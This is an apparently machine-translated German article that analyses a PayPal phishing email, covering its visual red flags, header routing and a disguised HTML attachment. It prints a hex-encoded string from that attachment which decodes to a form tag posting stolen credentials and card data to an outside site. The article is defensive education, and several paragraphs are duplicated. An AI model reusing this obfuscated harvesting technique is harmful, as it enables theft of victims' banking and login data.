Online-Sicherheit: Abbau der Anatomie einer Phishing-E-Mail

Inhaltsverzeichnis:

Video: Online-Sicherheit: Abbau der Anatomie einer Phishing-E-Mail

Video: Online-Sicherheit: Abbau der Anatomie einer Phishing-E-Mail
Video: Was ist PXE-Boot (Bereitstellungsdienste)? 2024, März
Online-Sicherheit: Abbau der Anatomie einer Phishing-E-Mail
Online-Sicherheit: Abbau der Anatomie einer Phishing-E-Mail
Anonim
 In der heutigen Welt, in der alle Informationen online sind, ist Phishing einer der populärsten und verheerendsten Online-Angriffe, da Sie einen Virus jederzeit bereinigen können. Wenn jedoch Ihre Bankdaten gestohlen werden, haben Sie Schwierigkeiten. Hier ist eine Aufschlüsselung eines solchen Angriffs, den wir erhalten haben.
In der heutigen Welt, in der alle Informationen online sind, ist Phishing einer der populärsten und verheerendsten Online-Angriffe, da Sie einen Virus jederzeit bereinigen können. Wenn jedoch Ihre Bankdaten gestohlen werden, haben Sie Schwierigkeiten. Hier ist eine Aufschlüsselung eines solchen Angriffs, den wir erhalten haben.

Denken Sie nicht, dass es nur Ihre Bankdaten sind, die wichtig sind: Wenn jemand die Kontrolle über Ihr Konto-Login erlangt, kennt er nicht nur die Informationen, die in diesem Konto enthalten sind, sondern die Wahrscheinlichkeit, dass die gleichen Login-Informationen für verschiedene andere verwendet werden Konten. Und wenn sie Ihr E-Mail-Konto gefährden, können sie alle Ihre anderen Kennwörter zurücksetzen.

Neben den starken und variierenden Passwörtern müssen Sie also immer nach gefälschten E-Mails Ausschau halten, die sich als echte Maskerade erweisen. Während die meisten Phishing-Versuche amateurhaft sind, sind einige ziemlich überzeugend, daher ist es wichtig zu verstehen, wie man sie auf Oberflächenebene erkennt und wie sie unter der Haube arbeiten.

Bild von asirap

Untersuchen, was in Sicht ist

Wie die meisten Phishing-Versuche „benachrichtigt“unsere Beispiel-E-Mail Sie über Aktivitäten auf Ihrem PayPal-Konto, die unter normalen Umständen alarmierend sind. Der Aufruf zum Handeln besteht also darin, Ihr Konto zu überprüfen / wiederherzustellen, indem Sie nahezu alle persönlichen Informationen einreichen, die Sie sich vorstellen können. Das ist wieder ziemlich formelhaft.

Zwar gibt es sicherlich Ausnahmen, aber so ziemlich jede Phishing- und Scam-E-Mail wird mit roten Flaggen direkt in der Nachricht selbst geladen. Selbst wenn der Text überzeugend ist, können Sie normalerweise viele Fehler im Nachrichtentext finden, die darauf hinweisen, dass die Nachricht nicht legitim ist.

Der Nachrichtentext

Auf den ersten Blick ist dies eine der besseren Phishing-E-Mails, die ich gesehen habe. Es gibt keine Rechtschreib- oder Grammatikfehler, und die Aussage liest sich entsprechend dem, was Sie vielleicht erwarten. Es gibt jedoch einige rote Markierungen, die Sie sehen können, wenn Sie den Inhalt etwas genauer untersuchen.
Auf den ersten Blick ist dies eine der besseren Phishing-E-Mails, die ich gesehen habe. Es gibt keine Rechtschreib- oder Grammatikfehler, und die Aussage liest sich entsprechend dem, was Sie vielleicht erwarten. Es gibt jedoch einige rote Markierungen, die Sie sehen können, wenn Sie den Inhalt etwas genauer untersuchen.
  • "Paypal" - Der richtige Fall ist "PayPal" (Großbuchstabe P). Sie können sehen, dass beide Varianten in der Nachricht verwendet werden. Unternehmen sind mit ihrem Branding sehr bewusst, daher ist es zweifelhaft, dass so etwas den Korrekturprozess bestehen würde.
  • "ActiveX zulassen" - Wie oft haben Sie schon gesehen, dass ein seriöses, webbasiertes Unternehmen eine proprietäre Komponente verwendet, die nur mit einem einzigen Browser funktioniert, insbesondere wenn mehrere Browser unterstützt werden? Sicher, irgendwo da draußen macht es eine Firma, aber das ist eine rote Flagge.
  • "Sicher". - Beachten Sie, dass dieses Wort nicht am Rand des restlichen Textes steht. Selbst wenn ich das Fenster etwas mehr strecke, wird es nicht richtig umbrochen oder
  • "Paypal!" - Das Leerzeichen vor dem Ausrufezeichen sieht unbeholfen aus. Nur eine weitere List, von der ich sicher bin, dass sie nicht in einer legitimen E-Mail wäre.
  • "PayPal-Account Update Form.pdf.htm" - Warum würde Paypal ein "PDF" anhängen, insbesondere wenn sie nur auf eine Seite ihrer Website verlinken könnten? Warum sollten sie außerdem versuchen, eine HTML-Datei als PDF zu tarnen? Dies ist die größte rote Flagge von allen.

Der Nachrichtenkopf

Wenn Sie sich den Nachrichtenkopf ansehen, werden einige weitere rote Markierungen angezeigt:
Wenn Sie sich den Nachrichtenkopf ansehen, werden einige weitere rote Markierungen angezeigt:
  • Die Absenderadresse lautet [email protected].
  • Die zu adresse fehlt. Ich habe dies nicht ausgeblendet, es ist einfach nicht Teil des Standardnachrichtenkopfs. Normalerweise personalisiert eine Firma, die Ihren Namen hat, die E-Mail an Sie.

Der Anhang

Wenn ich die Anlage öffne, können Sie sofort erkennen, dass das Layout nicht korrekt ist, da Stilinformationen fehlen. Warum sollte PayPal ein HTML-Formular per E-Mail senden, wenn Sie einfach einen Link auf der Website angeben könnten?

Hinweis: Wir haben dafür den integrierten HTML-Anhang-Viewer von Google Mail verwendet. Wir empfehlen jedoch, KEINE Anhänge von Betrügern zu öffnen. Noch nie. Je. Sie enthalten häufig Exploits, mit denen Trojaner auf Ihrem PC installiert werden, um Ihre Kontoinformationen zu stehlen.

Wenn Sie ein wenig weiter scrollen, sehen Sie, dass dieses Formular nicht nur nach unseren PayPal-Anmeldeinformationen, sondern auch nach Bank- und Kreditkarteninformationen verlangt. Einige Bilder sind defekt.
Wenn Sie ein wenig weiter scrollen, sehen Sie, dass dieses Formular nicht nur nach unseren PayPal-Anmeldeinformationen, sondern auch nach Bank- und Kreditkarteninformationen verlangt. Einige Bilder sind defekt.
Es ist offensichtlich, dass dieser Phishing-Versuch alles auf einen Schlag erledigt.
Es ist offensichtlich, dass dieser Phishing-Versuch alles auf einen Schlag erledigt.

Der technische Zusammenbruch

Es sollte zwar klar sein, dass dies ein Phishing-Versuch ist, doch wir werden jetzt die technische Zusammensetzung der E-Mail abbauen und sehen, was wir finden können.

Informationen aus der Anlage

Als Erstes sollten Sie sich die HTML-Quelle des Anhangsformulars ansehen, die die Daten an die gefälschte Site übermittelt.

Wenn Sie die Quelle schnell anzeigen, erscheinen alle Links gültig, da sie entweder auf "paypal.com" oder "paypalobjects.com" zeigen, was beide legitim sind.

Nun wollen wir uns einige grundlegende Seiteninformationen ansehen, die Firefox auf der Seite sammelt.
Nun wollen wir uns einige grundlegende Seiteninformationen ansehen, die Firefox auf der Seite sammelt.
Wie Sie sehen, werden einige Grafiken von den Domains "blessedtobe.com", "goodhealthpharmacy.com" und "pic-upload.de" anstelle der legitimen PayPal-Domains abgerufen.
Wie Sie sehen, werden einige Grafiken von den Domains "blessedtobe.com", "goodhealthpharmacy.com" und "pic-upload.de" anstelle der legitimen PayPal-Domains abgerufen.
Image
Image

Informationen aus den E-Mail-Headern

Als Nächstes betrachten wir die rohen E-Mail-Nachrichtenkopfzeilen. Google Mail macht dies über die Menüoption Original anzeigen in der Nachricht verfügbar.

Wenn Sie sich die Header-Informationen für die Originalnachricht ansehen, sehen Sie, dass diese Nachricht mit Outlook Express 6 erstellt wurde. Ich bezweifle, dass PayPal Mitarbeiter hat, die jede dieser Nachrichten manuell über einen veralteten E-Mail-Client senden.
Wenn Sie sich die Header-Informationen für die Originalnachricht ansehen, sehen Sie, dass diese Nachricht mit Outlook Express 6 erstellt wurde. Ich bezweifle, dass PayPal Mitarbeiter hat, die jede dieser Nachrichten manuell über einen veralteten E-Mail-Client senden.
Wenn Sie nun die Routing-Informationen betrachten, können wir die IP-Adresse sowohl des Senders als auch des weitergeleiteten Mail-Servers sehen.
Wenn Sie nun die Routing-Informationen betrachten, können wir die IP-Adresse sowohl des Senders als auch des weitergeleiteten Mail-Servers sehen.
Die IP-Adresse des Benutzers ist der ursprüngliche Absender. Nach einem kurzen Blick auf die IP-Informationen sehen wir, dass die sendende IP in Deutschland ist.
Die IP-Adresse des Benutzers ist der ursprüngliche Absender. Nach einem kurzen Blick auf die IP-Informationen sehen wir, dass die sendende IP in Deutschland ist.
Wenn wir uns die Mail-Adresse des weitergeleiteten Mail-Servers (mail.itak.at) ansehen, sehen Sie, dass dies ein ISP mit Sitz in Österreich ist. Ich bezweifle, dass PayPal ihre E-Mails direkt über einen in Österreich ansässigen ISP leitet, wenn sie über eine umfangreiche Serverfarm verfügen, die diese Aufgabe problemlos erledigen könnte.
Wenn wir uns die Mail-Adresse des weitergeleiteten Mail-Servers (mail.itak.at) ansehen, sehen Sie, dass dies ein ISP mit Sitz in Österreich ist. Ich bezweifle, dass PayPal ihre E-Mails direkt über einen in Österreich ansässigen ISP leitet, wenn sie über eine umfangreiche Serverfarm verfügen, die diese Aufgabe problemlos erledigen könnte.
Image
Image

Wohin gehen die Daten?

Wir haben also eindeutig festgestellt, dass es sich um eine Phishing-E-Mail handelt und Informationen dazu gesammelt haben, woher die Nachricht stammt. Wie sieht es aus, wohin Ihre Daten gesendet werden?

Um dies zu sehen, müssen wir den HTM-Anhang zuerst auf unserem Desktop speichern und in einem Texteditor öffnen. Wenn Sie darin blättern, scheint alles in Ordnung zu sein, außer wenn wir zu einem verdächtig aussehenden Javascript-Block kommen.

Die vollständige Quelle des letzten Blocks von Javascript ausbrechen, sehen wir:
Die vollständige Quelle des letzten Blocks von Javascript ausbrechen, sehen wir:

Jedes Mal, wenn Sie eine große durcheinandergebrachte Kette scheinbar zufälliger Buchstaben und Zahlen in einem Javascript-Block sehen, ist dies normalerweise etwas Verdächtiges. Beim Blick auf den Code wird die Variable "x" auf diese große Zeichenfolge gesetzt und dann in die Variable "y" dekodiert. Das Endergebnis der Variablen "y" wird dann als HTML in das Dokument geschrieben.

Da die große Zeichenfolge aus den Zahlen 0-9 und den Buchstaben a-f besteht, wird sie höchstwahrscheinlich über eine einfache ASCII-zu-Hex-Umwandlung codiert:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Wird übersetzt in:

Es ist kein Zufall, dass dies in ein gültiges HTML-Formular-Tag dekodiert wird, das die Ergebnisse nicht an PayPal, sondern an eine Rogue-Site sendet.

Wenn Sie den HTML-Quellcode des Formulars anzeigen, werden Sie außerdem sehen, dass dieses Formular-Tag nicht sichtbar ist, da es dynamisch über das Javascript generiert wird. Dies ist eine clevere Methode, um zu verbergen, was der HTML-Code tatsächlich tut, wenn jemand die generierte Quelle des Anhangs (wie zuvor) lediglich sehen würde, anstatt den Anhang direkt in einem Texteditor zu öffnen.

Wenn Sie ein schnelles whois auf der beleidigenden Site ausführen, können Sie feststellen, dass dies eine Domäne ist, die von einem beliebten Webhost 1und1 gehostet wird.
Wenn Sie ein schnelles whois auf der beleidigenden Site ausführen, können Sie feststellen, dass dies eine Domäne ist, die von einem beliebten Webhost 1und1 gehostet wird.
Auffällig ist, dass die Domain einen lesbaren Namen verwendet (im Gegensatz zu "dfh3sjhskjhw.net") und die Domain seit 4 Jahren registriert ist. Aus diesem Grund glaube ich, dass diese Domäne entführt und in diesem Phishing-Versuch als Pfand verwendet wurde.
Auffällig ist, dass die Domain einen lesbaren Namen verwendet (im Gegensatz zu "dfh3sjhskjhw.net") und die Domain seit 4 Jahren registriert ist. Aus diesem Grund glaube ich, dass diese Domäne entführt und in diesem Phishing-Versuch als Pfand verwendet wurde.

Zynismus ist eine gute Verteidigung

Wenn es darum geht, online sicher zu bleiben, schadet es nie, ein bisschen Zynismus zu haben.

Ich bin mir sicher, dass die Beispiel-E-Mail mehr rote Flaggen enthält. Was wir oben erwähnt haben, sind Indikatoren, die wir bereits nach wenigen Minuten der Untersuchung gesehen haben. Hypothetisch würde die technische Analyse immer noch ihre wahre Natur zeigen, wenn die Oberfläche der E-Mail ihren legitimen Gegenwert zu 100% nachahmt. Deshalb ist es wichtig zu importieren, was man sehen kann und was nicht.

Empfohlen: